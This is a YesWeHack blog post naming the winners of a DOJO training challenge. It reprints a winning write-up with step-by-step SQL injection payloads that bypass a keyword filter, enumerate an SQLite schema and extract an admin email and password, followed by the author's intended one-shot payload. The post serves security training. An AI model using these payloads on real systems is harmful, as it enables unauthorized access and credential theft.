DOJO CHALLENGE #2 Winners!

Categories
Talent Development YesWeRHackers

Following the release of the YesWeHack DOJO, we have initiated a challenge series. The second DOJO CHALLENGE had been the arena of fierce competition. The first five challenge solves and the five best write-up reports were rewarded with a nifty goodies pack.

What is DOJO?

The YesWeHack DOJO is a visual exploitation environment and training platform geared towards learning bug exploitation the fun and visual way.


Introducing the YesWeHack DOJO

The DOJO is three things in one: a learning tool, training platform and a playground.


The DOJO is the arena where the second challenge took place (see the announcement here).

WINNERS!

We are glad to announce the #2 DOJO Challenge winners list. Everyone will receive a goodies pack.

5 FIRST SOLVES

SakiiR
neolex
marcosen
bananabr
pinta

5 BEST WRITE-UP REPORTS

sehno
smidthjohn886
neolex
yongi
pinta

A warm thank you to the other contestants–you will soon be able to give another challenge a try again! Subscribe to our Twitter or Linkedin feeds for future challenge announcements.

Read on to find the best write-up as well as the challenge’s author recommendations.

The challenge

The Challenge here was exploiting a web form and fetching back sensitive information from the SQLite database through an effective one-shot SQL injection on a contact form field. The returned string must contain the system administrator email and password concatenated in a mandatory sequence:
admin:<email>:<password>

We also asked the contestants to produce a qualified write-up report explaining the logic allowing such exploitation. This write-up serves two purposes:

  • Ensure no copy-paste would occur.
  • Determine the contestant ability to properly describe a vulnerability and its vectors inside a professionally redacted report. This capacity gives us invaluable hints on your own, unique, talent as a bug hunter.

Best write-up report

Sehno

We publish here the best write-up report for this session with the permission of its author, Sehno.


Thank you!

/—– SENSEI SEHNO’s REPORT ———————————————————–/

Description

An SQL injection attack consists of the insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

Step-by-step Reproduction Instructions

1-/ At first, I see that we are constrained by differents filters.

So the first thing to do is to bypass the filters with this payload :

') union SELselectECT  ('

Now we can show the tables of the database with this command:

') union SELselectECT sql from sqlite_master union SELselectECT  ('

The result is interesting but in the code we see that we have LIMIT 5 and we know that we don’t see all tables.

We search for another table with ‘user’ inside:

') union SELselectECT sql from sqlite_master WHERE name LIKE '%user%'union SELselectECT ('

We found a table ‘users’ with interesting details: email, password, role.

Now we can see emails on this table:

') union SELselectECT email from users union SELselectECT  ('

We see different emails but we are also restricted by the LIMIT 5. The table ‘users’ contain the attribute ‘role’. We list the role with this command:

') union SELselectECT role from users union SELselectECT  ('

Now we show users with ADMIN role:

') union SELselectECT email from users WHERE role = 'ADMIN' union SELselectECT  ('

Nice! All that’s missing now is the password :

') union SELselectECT password from users WHERE role = 'ADMIN' union SELselectECT  ('

Remember that the goal is to show the email and password like this:

So the final command is:

')  union SELselectECT username || ':' || email || ':' || password from users where role == 'ADMIN' union SELselectECT  ('

And here goes the result:

"text": "admin:[Redacted]@[Redacted].com:FLAG{Th1s_is_th3_4dm1n_p4ssw0rd}"

/—– END of SEHNO’s REPORT ———————————————————–/

BitK’s Editor note

BitK

BitK is the Technical Ambassador at Yes We Hack. He also created the DOJO and this challenge.

Instead of chaining requests with UNION, the intended solution was to bypass the comment filter the same way sehno did for the SELECT filter. This allows you to do the exfiltration in a single INSERT.

' || (SELselectECT username||':'||email||':'||password FROM users)) /select*

Around half the players used the /SELECT* version and the other half used the UNION technique. Both are valid in solutions.

I hope you had fun in this first challenge. Stay tuned for the next ones!